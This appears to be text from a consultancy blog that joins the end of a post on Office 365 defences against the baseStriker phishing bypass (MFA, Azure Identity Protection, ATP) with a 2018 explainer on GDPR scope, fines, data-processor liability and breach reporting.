The user credential reuse risk can be mitigated by Azure Identity Protection. When Microsoft becomes aware of a breach containing a re-used set of credentials, you can have Azure Identity Protection alert you and automatically force the user's password to be reset. That security feature can also identify suspicious login patterns, such as an attacker logging in from a remote country. Azure Identity Protection is just one way to mitigate the re-use of compromised user credentials. Another security feature is enabling MFA (multi-factor authentication), which prevents user credentials being used by anyone but the account owner. Azure Active Directory conditional access can enforce MFA and other conditions on logins, such as requiring all logins to originate from trusted devices.
If the attacker manages to gain remote access to a user's computer, Windows Defender ATP can detect the suspicious behavior of the attacker's exploit tools and alert you to the breach immediately. If the attacker is performing reconnaissance of your network and attempting privilege escalation, Azure ATP can alert you to that suspicious activity immediately. On the chance that the attacker still manages to figure out who to send a phishing email to, the use of MFA and other identity protection measures mentioned earlier prevents them from directly exploiting a mailbox. That leaves them with email spoofing or impersonation as a vector, which can be mitigated with ATP once again.
All of those security measures mentioned above must be evaluated, tested, and deployed to be effective and some of them require additional investment in licenses. Unfortunately, there isn’t a single button to push that will turn on all of those security features; some of the features work in isolation, some of them are tightly integrated with other features. All of them work together to secure your organization’s Outlook 365 setup.
baseStriker is a perfect example of a very simple exploit with a huge potential to cause significant damage to your organization. As more organizations move further into cloud offerings, we will need to stay more aware of the potential security risks and remain vigilant.
As you know, unlike MiFID II or other pan-European regulations, the General Data Protection Regulation (GDPR) reaches beyond the EU and impacts those businesses that formerly thought they were safely ensconced in the U.S. Some are still wondering whether they have to comply with it….I mean, shouldn’t they be getting a letter in the mail or something? But then, there are the rather large fines they might hear about…20mn EUR or $28mn USD depending on exchange rate, and all of a sudden the veil of willful ignorance must lift and they must ask: What about us?
What is GDPR and Why does it exist?
The short answer to that question is public concern over privacy. The EU has long had more stringent rules around how companies use the personal data of its citizens. In 1995, the EU enacted the Data Protection Directive. This was well before the Internet became the constant data marketplace that it is today. Consequently, the directive is outdated and does not address the many ways in which data is stored, collected and transferred today. Thus, the EU Parliament adopted the GDPR in April 2016, replacing the outdated data protection directive from 1995. GDPR consists of 11 chapters and 91 articles that outline the requirements and regulations imposed on businesses to protect the personal data and the privacy of EU citizens for transactions that occur within EU member states. GDPR also regulates the exportation of personal data outside the EU. The regulation is consistent across all 28 EU member states, which means that a company thankfully has just one standard to meet within the EU.
As noted above, foreign companies that collect data on citizens in European Union (EU) countries must also comply with GDPR. More specifically, if your foreign company interacts with any customer data from the EU’s 28 member states, then your company must comply with the pending regulation because it is subject to the aforementioned fine. If your company is in the clear, then rejoice, but I still encourage you to continue reading because this will prepare you for that moment when your company works with EU customer data. Most importantly, if your company is US based, with each Facebook debacle we are inching closer toward stricter data privacy regulation in the U.S.
Compliance with GDPR will cause some concerns and new expectations of your security team because the regulation takes a wide view of what constitutes personally identifiable information. Your company must utilize the same level of protection for data such as an individual’s IP address or cookie data as it does for Name, Address and Social Security number. Like any regulation, it is an inch deep and a mile wide with a lot to be desired in interpretation and candor. GDPR states that a company must provide a “reasonable” level of data control for personal data, but does not define what constitutes “reasonable”. This ambiguity gives EU’s GDPR governing body a lot of leeway when it comes to assessing fines for data breaches and non-compliance.
What types of data does the GDPR protect?
How does GDPR define “data control”?
GDPR states that data can’t be kept indefinitely. It requires a company to completely erase data when a data subject revokes its consent or a third-party requests data deletion or a third-party agreement comes to an end.
Which companies do GDPR affect?
The regulation affects any company that stores or processes personal information about EU citizens, even if it does not have a business presence within the EU. The specific criteria are below:
Come again? The last criterion effectively encompasses almost all companies with fewer than 250 employees because it’s interpreted as any company processing, storing and exchanging data points on EU citizens.
When does my company need to be in compliance?
By now, you should have a good inclination about your company’s requirement to comply with GDPR. Your company must be compliant with GDPR by May 25, 2018. That’s this month!
Who within my company is responsible for compliance?
The GDPR regulation defines several roles that are responsible for ensuring compliance:
GDPR holds Data Processors liable for breaches or non-compliance. It’s entirely possible that both your company and a processing partner such as a cloud provider will be liable for penalties even if the fault is entirely on the processing partner. Yes, GDPR just injected third-party risk into your data processing and storage strategies and ultimately changes your company’s third-party selection and business interactions.
How does the GDPR affect my company and its third-party service providers?
The GDPR regulation places equal liability on a Data Controller (a company that owns the data) and a Data Processor (a third party that manages or interacts with a Data Controller’s data). The regulation is interpreted to mean that if a third-party Data Processor isn’t in compliance with GDPR, your company isn’t in compliance either.
This means that all existing and new agreements with third-party Data Processors (i.e., cloud providers, SaaS vendors, or payroll service providers) must explicitly declare data responsibilities within the GDPR structure. Agreements must also define data management and protection processes, and data breach reporting.
GDPR has strict rules for reporting breaches:
What happens if my company isn’t in compliance with the GDPR?
GDPR allows for steep penalties ranging from 10-20mn EUR or 2-4% of global annual revenue for non-compliance. If your company isn’t compliant due to technical measures, the fine imposed may be up to 10mn EUR or 2% of global revenue from the prior year, whichever is greater. If not compliant due to key provisions of the GDPR, such as transferring data to third parties with inadequate data protection measures, fines imposed may be up to 20mn EUR or 4% of global annual revenue from the prior year, whichever is greater.
What should my company do to prepare for the GDPR?
You want to know what data you store and process on EU citizens and understand the risks around it. Your risk assessment must outline measures taken to mitigate those risks.
Your company may already have a plan in place, but it must review and update it to ensure that it aligns with GDPR requirements. Data breach reporting is one of the trickiest areas of GDPR compliance, especially given the short timeframe of 72 hours, because your company will still be trying to figure out the scope of a data breach and the appropriate response during that window. Given the required rapid response, it’s best to have a preexisting relationship with law enforcement or to understand who you would reach out to. Typically, this would be either the Federal Bureau of Investigation or the Secret Service.
GDPR doesn’t clearly state whether the DPO needs to be a discrete position, so presumably your company can appoint someone as long as that person can ensure data protection with no conflict of interest. In practical terms, this means that your IT manager or director, CTO or security manager are bad choices for your DPO. Your marketing manager is a conflict of interest, while sensible options could be your head of finance, risk or legal. Your DPO doesn’t need to be someone within your company, so it may be easier to appoint a lawyer or external expert. GDPR states that a DPO may work for multiple organizations, so even HLC could function in such a role.
When it comes to GDPR compliance, your legal or compliance departments can’t do it alone. Instead, any department or employee at your company with involvement in processing personal data must be involved and trained appropriately about the GDPR.
The ability to collect personal data and contact individuals is the lifeblood of the charity and not-for-profit sectors. However, under GDPR, both must comply with the same rules as every other company.
Smaller companies will be affected by GDPR, some more significantly than others. If your company is small, then it may not have the resources necessary to meet GDPR’s requirements. HLC is available to provide advice and technical expertise to help you through the process and maximize internal resources.
GDPR isn’t a simple checklist or one-size-fits-all framework; it speaks in terms of broad standards instead of specific rules, requiring your company to decide which measures achieve compliance. Those measures will vary from one company to another. GDPR is a comprehensive legal and regulatory framework that imposes complex initial requirements and ongoing duties upon your company. Compliance is a marathon, not a sprint.